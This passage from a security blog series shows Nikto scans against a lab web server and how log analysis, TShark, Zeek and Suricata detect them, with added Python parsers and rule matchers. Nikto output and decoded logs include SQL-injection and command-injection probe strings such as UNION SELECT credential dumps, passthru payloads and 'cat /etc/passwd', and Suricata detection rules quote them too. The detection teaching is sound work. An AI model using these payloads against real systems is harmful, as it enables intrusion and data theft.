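                                 "response_bytes": int(h["response_body_len"])})
    return findings


def _tsv(fields, rows):
    # Constructed Zeek-style log text: a #fields header followed by tab-separated rows.
    return "#fields\t" + "\t".join(fields) + "\n" + "\n".join("\t".join(r) for r in rows) + "\n"


# Sample rows reconstructed from the post's http.log and files.log output.
HTTP_LOG = _tsv(HTTP_FIELDS, [
    ["1687462020.720561", "C9k6p6FxgHAgjfjGa", "10.0.0.108", "47986", "10.0.0.106", "80", "1", "POST",
     "10.0.0.106", "/dvwa/vulnerabilities/upload/", "http://10.0.0.106/dvwa/vulnerabilities/upload/", "1.1",
     "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", "http://10.0.0.106",
     "1582", "4055", "200", "OK", "-", "-", "(empty)", "-", "-", "-",
     "FbKoDB2gXDz6wz2Z74,F3m3sc1e7ZmJMAs5Cc,FVC9nG4cwHcT19LmOa", "malicious.php", "text/x-php",
     "Fnwwck3gnEGZ79OWy1", "-", "text/html"],
    ["1687462143.814819", "CwNOXb1eZ6LvtPEI96", "10.0.0.108", "33048", "10.0.0.106", "80", "1", "GET",
     "10.0.0.106", "/dvwa/hackable/uploads/malicious.php", "-", "1.1", "curl/7.88.1", "-",
     "0", "2", "200", "OK", "-", "-", "(empty)", "-", "-", "-", "-", "-", "-", "FVkDFy3Q20vdj9aPCk", "-", "-"],
])
FILES_LOG = _tsv(FILES_FIELDS, [
    ["1687462020.720573", "F3m3sc1e7ZmJMAs5Cc", "C9k6p6FxgHAgjfjGa", "10.0.0.108", "47986", "10.0.0.106", "80",
     "HTTP", "0", "(empty)", "text/x-php", "malicious.php", "0.000000", "-", "T", "1111", "-", "0", "0", "F",
     "-", "-", "-", "-", "-", "-", "-"],
])

if __name__ == "__main__":
    for f in find_script_uploads(HTTP_LOG, FILES_LOG):
        print(f)
```

Two findings come out: the upload of malicious.php (1111 bytes in files.log, joined through fuid F3m3sc1e7ZmJMAs5Cc) and the later GET for it, which returned only 2 bytes. Keying the upload check on Zeek's sniffed mime_type rather than the client's declared Content-Type is the point: the client is free to lie in the header, but not about what the bytes look like.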

Moving on to the IDS/IPS.

Detect - Suricata (IDS) Analysis

Set up Suricata to operate in IDS mode

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all

How many alerts triggered for this activity?

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ cat fast.log | grep --perl-regexp '\[\*\*\].*?\[\**\]' --only-matching | wc --lines
1    

Hmmm! One alert! Interesting!!

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ cat fast.log 
06/22/2023-15:27:00.720561  [**] [1:2011768:8] ET WEB_SERVER PHP tags in HTTP POST [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:47986 -> 10.0.0.106:80

Looking at the alert-debug.log file:

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ cat alert-debug.log | more                                                                                                                      
+================
TIME:              06/22/2023-15:27:00.720561
PKT SRC:           wire/pcap
SRC IP:            10.0.0.108
DST IP:            10.0.0.106
PROTO:             6
SRC PORT:          47986
DST PORT:          80
TCP SEQ:           2986100032
TCP ACK:           2432827111
FLOW:              to_server: TRUE, to_client: FALSE
FLOW Start TS:     06/22/2023-15:27:00.719233
FLOW PKTS TODST:   3
FLOW PKTS TOSRC:   1
FLOW Total Bytes:  1708
FLOW IPONLY SET:   TOSERVER: TRUE, TOCLIENT: TRUE
FLOW ACTION:       DROP: FALSE
FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE
FLOW APP_LAYER:    DETECTED: TRUE, PROTO 1
PACKET LEN:        1514
PACKET:
...

We can see that this ties in with the other network-based evidence above, especially when we focus on TCP source port 47986.

Peeking a bit more into this PHP traffic.

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ cat alert-debug.log | grep ".php"
 03C0  63 61 74 69 6F 6E 2F 78  2D 70 68 70 0D 0A 0D 0A   cation/x -php....
 03D0  2F 2A 3C 3F 70 68 70 20  2F 2A 2A 2F 20 65 72 72   /*<?php  /**/ err
 0370  2E 70 68 70 22 0D 0A 43  6F 6E 74 65 6E 74 2D 54   .php"..C ontent-T
 0390  2F 78 2D 70 68 70 0D 0A  0D 0A 2F 2A 3C 3F 70 68   /x-php.. ../*<?ph
 0370  2E 70 68 70 22 0D 0A 43  6F 6E 74 65 6E 74 2D 54   .php"..C ontent-T
 0390  2F 78 2D 70 68 70 0D 0A  0D 0A 2F 2A 3C 3F 70 68   /x-php.. ../*<?ph

Well I'm going to close off for now.

Hope you enjoyed the posts in this series:


References:

Beginning Nikto - SQL Injection with default evasion

This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection.

From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and/or processes used for the network forensics are log analysis, TShark, Zeek and Suricata.

The Hack - SQL Injection with default evasion.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 9
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.0.106
+ Target Hostname:    10.0.0.106
+ Target Port:        80
+ Start Time:         2023-06-09 14:09:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Retrieved x-powered-by header: PHP/8.0.28.
+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* - Redirects (302) to http://10.0.0.106/dashboard/ , My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
....
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) - Redirects (302) to http://10.0.0.106/dashboard/ , Joomla is vulnerable to a SQL injection which can lead to administrator access. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0
+ 783 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-06-09 14:09:22 (GMT-4) (2 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
 
Once again, index.php does not have most of the parameters that Nikto is reporting as vulnerable. What do I make of the output from the tool? I make that it is time for me to move on.

See here for more guidance on SQL Injection:
Learning by practicing: Beginning Web Application Testing: SQL Injection - Mutillidae (securitynik.com)
Learning by practicing: Continuing SQL Injection with SQLMap - Exploitation (securitynik.com)


Detect - Log Analysis

Quick log analysis says most of this activity is a waste of time. First, most of the parameters targeted here do not exist on the index.php page. We know this from the previous posts in this series. Second, there is no request.php file.

I've lost interest. Maybe I need to do the test from another perspective.

See this link for assistance with detecting SQL injection in your infrastructure.


Detect - Suricata (IDS) Analysis

Set up Suricata to operate in IDS mode

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all

What does the IDS see?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5
     35 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 
     14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315 
      6 1:2006445:14] ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM 
      5 1:2006446:14] ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT 
      4 1:2011042:6] ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt 


We see 3 unique alerts for SQL injection attempts. Find the associated rules:

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ grep --perl-regexp "2006445|2006446|2011042" /var/lib/suricata/rules/suricata.rules 
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006445; classtype:web-application-attack; sid:2006445; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_05_01;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT"; flow:established,to_server; http.uri; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006446; classtype:web-application-attack; sid:2006446; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_01;)

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"CONCAT"; nocase; pcre:"/SELECT.+CONCAT/i"; reference:url,ferruh.mavituna.com/sql-injection-cheatsheet-oku/; reference:url,www.webdevelopersnotes.com/tutorials/sql/a_little_more_on_the_mysql_select_statement.php3; reference:url,doc.emergingthreats.net/2011042; classtype:web-application-attack; sid:2011042; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_14;)

Find an alert for "2006445"

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]
└─$ less alert-debug.log

ALERT CNT:           2
ALERT MSG [00]:      ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM
ALERT GID [00]:      1
ALERT SID [00]:      2006445
ALERT REV [00]:      14
ALERT CLASS [00]:    Web Application Attack
ALERT PRIO [00]:     1
ALERT FOUND IN [00]: STATE
ALERT IN TX [00]:    34
PAYLOAD LEN:         316
PAYLOAD:
 0000  47 45 54 20 2F 73 69 74  65 2F 27 25 32 30 55 4E   GET /sit e/'%20UN
 0010  49 4F 4E 25 32 30 41 4C  4C 25 32 30 53 45 4C 45   ION%20AL L%20SELE
 0020  43 54 25 32 30 46 69 6C  65 54 6F 43 6C 6F 62 28   CT%20Fil eToClob(
 0030  27 2F 65 74 63 2F 70 61  73 73 77 64 27 2C 27 73   '/etc/pa sswd','s
 0040  65 72 76 65 72 27 29 3A  3A 68 74 6D 6C 2C 30 25   erver'): :html,0%
 0050  32 30 46 52 4F 4D 25 32  30 73 79 73 75 73 65 72   20FROM%2 0sysuser
 0060  73 25 32 30 57 48 45 52  45 25 32 30 75 73 65 72   s%20WHER E%20user
 0070  6E 61 6D 65 3D 55 53 45  52 25 32 30 2D 2D 2F 2E   name=USE R%20--/.
 0080  68 74 6D 6C 20 48 54 54  50 2F 31 2E 31 0D 0A 55   html HTT P/1.1..U
 0090  73 65 72 2D 41 67 65 6E  74 3A 20 4D 6F 7A 69 6C   ser-Agen t: Mozil
 00A0  6C 61 2F 35 2E 30 20 28  57 69 6E 64 6F 77 73 20   la/5.0 ( Windows 
 00B0  4E 54 20 31 30 2E 30 3B  20 57 69 6E 36 34 3B 20   NT 10.0;  Win64; 
 00C0  78 36 34 29 20 41 70 70  6C 65 57 65 62 4B 69 74   x64) App leWebKit
 00D0  2F 35 33 37 2E 33 36 20  28 4B 48 54 4D 4C 2C 20   /537.36  (KHTML, 
 00E0  6C 69 6B 65 20 47 65 63  6B 6F 29 20 43 68 72 6F   like Gec ko) Chro
 00F0  6D 65 2F 37 34 2E 30 2E  33 37 32 39 2E 31 36 39   me/74.0. 3729.169
 0100  20 53 61 66 61 72 69 2F  35 33 37 2E 33 36 0D 0A    Safari/ 537.36..
 0110  43 6F 6E 6E 65 63 74 69  6F 6E 3A 20 4B 65 65 70   Connecti on: Keep
 0120  2D 41 6C 69 76 65 0D 0A  48 6F 73 74 3A 20 31 30   -Alive.. Host: 10
 0130  2E 30 2E 30 2E 31 30 36  0D 0A 0D 0A               .0.0.106 ....

That's it. Moving on.

Beginning Nikto - Command Execution / Remote Shell

This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection.

From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and/or processes used for the network forensics are log analysis, TShark, Zeek and Suricata.

The Hack - Beginning Nikto - Command Execution / Remote Shell 

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 8
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.0.106
+ Target Hostname:    10.0.0.106
+ Target Port:        80
+ Start Time:         2023-06-07 15:54:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Retrieved x-powered-by header: PHP/8.0.28.
+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.
+ ...
+ /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.
+ /?-s - Redirects (302) to http://10.0.0.106/dashboard/ , PHP allows retrieval of the source code via the -s parameter, and may allow command execution.
+ 1074 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-06-07 15:54:22 (GMT-4) (2 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Looking at the above, one may immediately draw the conclusion that this site is vulnerable. However, we know from our previous posts that the parameters referenced on "index.php", such as "name", do not exist on this page.


Detect - Log Analysis

Jumping straight to the decoding of the URLs. Take a look at the first 7 lines with parameters that need decoding.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching  | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | head --lines=7
%0acat%0a/etc/passwd%0a 
aaaaaaaa 
action=load&whois=%3Bid 
action=modify_user 
APP=qmh-news&TEMPLATE=;ls%20/etc| 
arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D 
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 

Decoding the above, and the rest of them, with urlencode -d.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching  | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }'
...
aaaaaaaa
action=load
action=modify_user
alert-debug.log
arguments=O:12:"vB_dB_Result":2:{s:5:"
/bin/cat /etc/passwd
cat
cat /etc/hosts
cat /etc/passwd
cat /etc/passwd 
/c dir
/c dir c:\
/c dir c:\"
/c dir /OG
cli=aa aa'cat /etc/hosts
cmd=cat /etc/passwd
cmd=dir c:\\
command=savesetup
conn.log
/c ver
data=Download
dns.log
email=x
/etc/passwd
_MAILTO=xx
message=test\
name=forums
name=Forums
name=Network_Tools
name=PNphpBB2
Nikto=forums
Nikto=Forums
pass= 
process
QALIAS=x
Qname=root
QNikto=root
query=AAA
realname=aaa
realNikto=aaa
reporter.log
-s
sd=ls /etc
server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF
type=Library
-v
WSDL
xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&

We already know most of those parameters are non-existent. Additionally, the host running this web server is Windows based, not Linux.



Detect - Packet Analysis

Setting up for packet analysis: capture packets on ports 80 and 443.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$tshark -n -w tuning_1.pcap -f 'tcp port(80 or 443)' --interface eth0

Decoding the URLs from the packet data.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ tshark -n -r tuning_8.pcap -Y 'http.request.method == "GET"' -T fields -e http.request.uri | grep --perl-regexp '\?.*' --only-matching | \
grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | \
awk --field-separator='HTTP' '{ print $1 }' | sort --unique | \
awk --field-separator=' ' '{ system("urlencode -d "$1) }'

cat
/etc/passwd

aaaaaaaa
action=load
action=modify_user
cat /etc/passwd
cat /etc/hosts
/c dir
/c dir c:"
/c dir c:\
/c dir /OG
cli=aa aa'cat /etc/hosts
cmd=cat /etc/passwd
cmd=dir c:\
command=savesetup
/c ver
data=Download
...
name=forums
name=Forums
name=forums
name=Network_Tools
name=Forums
name=PNphpBB2
name=PNphpBB2
Nikto=forums
Nikto=Forums
Nikto=forums
Nikto=Forums
pass= 
QALIAS=x
/bin/cat /etc/passwd
Qname=root
cat /etc/passwd 
QNikto=root
cat /etc/passwd 
query=AAA
realNikto=aaa
-s
sd=ls /etc
realname=aaa
server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF
t=2
t=2
type=Library
type=Library
WSDL
xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&

Not much more to do here. Transitioning to Zeek.

Detect - Zeek Analysis

Setup Zeek

┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]
└─$ sudo zeek --iface any --no-checksums

Analyzing the http.log file.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat http.log | grep --perl-regexp "\s+\/.*?\s+" --only-matching | \
grep --perl-regexp '\?.*' --only-matching | grep --invert-match "phpinfo" | \
cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | \
sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }'
aaaaaaaa
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),121(bluetooth),133(scanner),141(vboxsf),142(kaboxer),147(docker)
action=load
action=modify_user
...
sd=ls
server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF
sh: 1: Syntax error: "(" unexpected
t=2
type=Library
type=Library
user=cpanel
user_id=1
-v
WSDL
x0acatx0a/etc/passwdx0a

The above information is the same as what was seen in the log and packet analysis sections. The difference is that it was extracted from Zeek's http.log file.
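As an added example (my own code, not from the post and not part of Nikto, Zeek or any of the tools above), here is the decode-and-dedupe step from the three pipelines above done in Python instead of grep/cut/awk. Two things are worth noting. First, each of those pipelines hands the query string to awk's system(), which runs it through /bin/sh. Zeek writes the unescaped URI to http.log, so the backticks in the %60id%20%60 probe arrive literal, and that is the most likely reason the "uid=1000(kali) ..." line and the "sh: 1: Syntax error" line appear in the Zeek output above: the analysis box ran part of a scan payload. Decoding with urllib.parse.unquote keeps the decoded text as data. Second, the same function reads either the request line of access.log or the uri column of Zeek's http.log. The log lines in the block are constructed to mirror the post's entries, and the column position for Zeek's uri field assumes the default http.log layout.

```python
import re
from urllib.parse import unquote

# Constructed sample, Apache combined log format (not the post's real access.log).
SAMPLE_ACCESS_LOG = '''\
10.0.0.107 - - [07/Jun/2023:15:54:21 -0400] "GET /cgi-bin/test.cgi?%0acat%0a/etc/passwd%0a HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.107 - - [07/Jun/2023:15:54:21 -0400] "GET /index.php?name=Forums&file=viewtopic&t=2 HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.107 - - [07/Jun/2023:15:54:21 -0400] "GET /phpinfo.php?x=1 HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.107 - - [07/Jun/2023:15:54:21 -0400] "GET /cal.cgi?calbirthdays=1&action=getday&comma=%22;echo%20%60id%20%60;die();echo%22 HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.107 - - [07/Jun/2023:15:54:21 -0400] "GET /index.php?name=Forums&file=viewtopic&t=2 HTTP/1.1" 302 - "-" "Mozilla/5.0"
'''

# Constructed Zeek http.log record (tab separated, #fields header omitted).
# Zeek stores the unescaped URI, so the backticks are already literal here.
SAMPLE_ZEEK_HTTP_LOG = (
    "1686163005.810950\tC7ccD83WRZobza0Lj9\t10.0.0.107\t59456\t10.0.0.106\t80\t1\tGET\t10.0.0.106\t"
    "/cal.cgi?calbirthdays=1&action=getday&comma=\";echo `id `;die();echo\"\t-\t1.1\tMozilla/5.0\n"
)

# The quoted request line in a combined-format entry: method, URI, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')


def uris_from_access_log(text: str) -> list[str]:
    """Pull the request URI out of every parseable access.log line."""
    uris = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            uris.append(m.group("uri"))
    return uris


def uris_from_zeek_http_log(text: str, uri_column: int = 9) -> list[str]:
    """Pull the uri column out of Zeek's http.log (default layout assumed: column 9)."""
    uris = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) > uri_column:
            uris.append(fields[uri_column])
    return uris


def decoded_queries(uris, exclude: str = "phpinfo", decode: bool = True) -> list[str]:
    """Unique, sorted query strings, percent-decoded in-process.

    Mirrors the grep/cut/awk/sort pipeline from the post (URIs containing
    'phpinfo' are skipped), but the decoded text is returned as data; nothing
    here is passed to a shell. Use decode=False for Zeek, whose uri field is
    already unescaped (decoding twice would alter a query that legitimately
    contained a percent sign).
    """
    seen = set()
    for uri in uris:
        if exclude in uri or "?" not in uri:
            continue
        query = uri.split("?", 1)[1]
        seen.add(unquote(query) if decode else query)
    return sorted(seen)


if __name__ == "__main__":
    for q in decoded_queries(uris_from_access_log(SAMPLE_ACCESS_LOG)):
        print(repr(q))  # repr() keeps the %0a newlines visible instead of splitting lines
    for q in decoded_queries(uris_from_zeek_http_log(SAMPLE_ZEEK_HTTP_LOG), decode=False):
        print(repr(q))
```

Printing with repr() is deliberate: the %0a probes decode to real newlines, which is why "cat" and "/etc/passwd" showed up on separate lines in the shell output above.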

Detect - Suricata (IDS) Analysis

Set up Suricata to operate in IDS mode.

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all

Wrapping this up with Suricata.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5
     45 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 
     23 1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt 
     22 1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt 
     14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315 
     12 1:2100982:12] GPL EXPLOIT unicode directory traversal attempt 

The one we will extract here is the entry with 23 hits: "1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt".

What is the rule looking for?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]
└─$ grep "2009361" /var/lib/suricata/rules/suricata.rules | fmt
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET
WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt";
flow:to_server,established; http.uri; content:"/cmd.exe"; nocase;
reference:url,doc.emergingthreats.net/2009361; classtype:attempted-recon;
sid:2009361; rev:8; metadata:created_at 2010_07_30, updated_at
2020_09_14;)

The rule checks that the 3-way handshake has completed (established) and that the traffic is going to the server (to_server). The server, in this case, is the device that sent the SYN-ACK while establishing the session during the three-way handshake. It then looks for the content "/cmd.exe" in the URI, case-insensitively (nocase). Let's find the packet where "/cmd.exe" is in the URI.
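To make the rule logic concrete, here is an added example (my own code, not Suricata's and not from the post) that re-implements just the http.uri, content/nocase and pcre parts of sid 2009361 and of the SELECT/CONCAT rule (sid 2011042) printed earlier in this series, and runs them against the request lines read back from the two alert-debug.log payloads. It percent-decodes the URI first because Suricata's http.uri buffer is the normalized URI. Everything else in the rules (flow, classtype, metadata, references) is ignored. The third request is a constructed, harmless search query that still satisfies the SELECT/CONCAT signature, which is a reminder of how broad these content matches are.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote


@dataclass
class UriRule:
    """The subset of a Suricata rule this example understands: the http.uri
    buffer, one or more content: matches with nocase, and an optional pcre
    applied with the i flag."""
    sid: int
    msg: str
    contents: tuple
    pcre: str = ""

    def matches(self, uri: str) -> bool:
        # http.uri is Suricata's normalized URI buffer, so decode before matching.
        norm = unquote(uri)
        lowered = norm.lower()
        if not all(c.lower() in lowered for c in self.contents):
            return False
        return not self.pcre or re.search(self.pcre, norm, re.IGNORECASE) is not None


# Transcribed from the two rules printed in this series; flow, classtype,
# metadata and references are deliberately ignored.
RULES = (
    UriRule(2009361, "ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt",
            ("/cmd.exe",)),
    UriRule(2011042, "ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt",
            ("SELECT", "CONCAT"), r"SELECT.+CONCAT"),
)

REQUEST_LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+")


def alerts_for_request(raw_request: str, rules=RULES) -> list[int]:
    """Return the sids whose URI checks fire on the request's first line."""
    m = REQUEST_LINE_RE.match(raw_request)
    if not m:
        return []
    return [r.sid for r in rules if r.matches(m.group("uri"))]


# Request lines read back from the two alert-debug.log hex dumps in the post.
CMD_EXE_REQUEST = "GET /cgi-bin/cmd.exe?/c+dir HTTP/1.1\r\nHost: 10.0.0.106\r\n\r\n"
UNION_SELECT_REQUEST = (
    "GET /site/'%20UNION%20ALL%20SELECT%20FileToClob('/etc/passwd','server')::html,"
    "0%20FROM%20sysusers%20WHERE%20username=USER%20--/.html HTTP/1.1\r\n"
)
# Constructed: an ordinary search query that nonetheless satisfies sid 2011042.
PLAIN_SEARCH_REQUEST = "GET /search?q=select%20concat HTTP/1.1\r\n"

if __name__ == "__main__":
    for req in (CMD_EXE_REQUEST, UNION_SELECT_REQUEST, PLAIN_SEARCH_REQUEST):
        print(req.split("\r\n", 1)[0], "->", alerts_for_request(req))
```

The UNION request from the earlier section fires sid 2006445 in Suricata but not the CONCAT rule, and the matcher agrees: it contains SELECT but no CONCAT, so the second content check fails before the pcre is even evaluated, which is also the order Suricata uses (cheap content matches first, pcre last).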

ALERT CNT:           1
ALERT MSG [00]:      ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt
ALERT GID [00]:      1
ALERT SID [00]:      2009361
ALERT REV [00]:      8
ALERT CLASS [00]:    Attempted Information Leak
ALERT PRIO [00]:     2
ALERT FOUND IN [00]: STATE
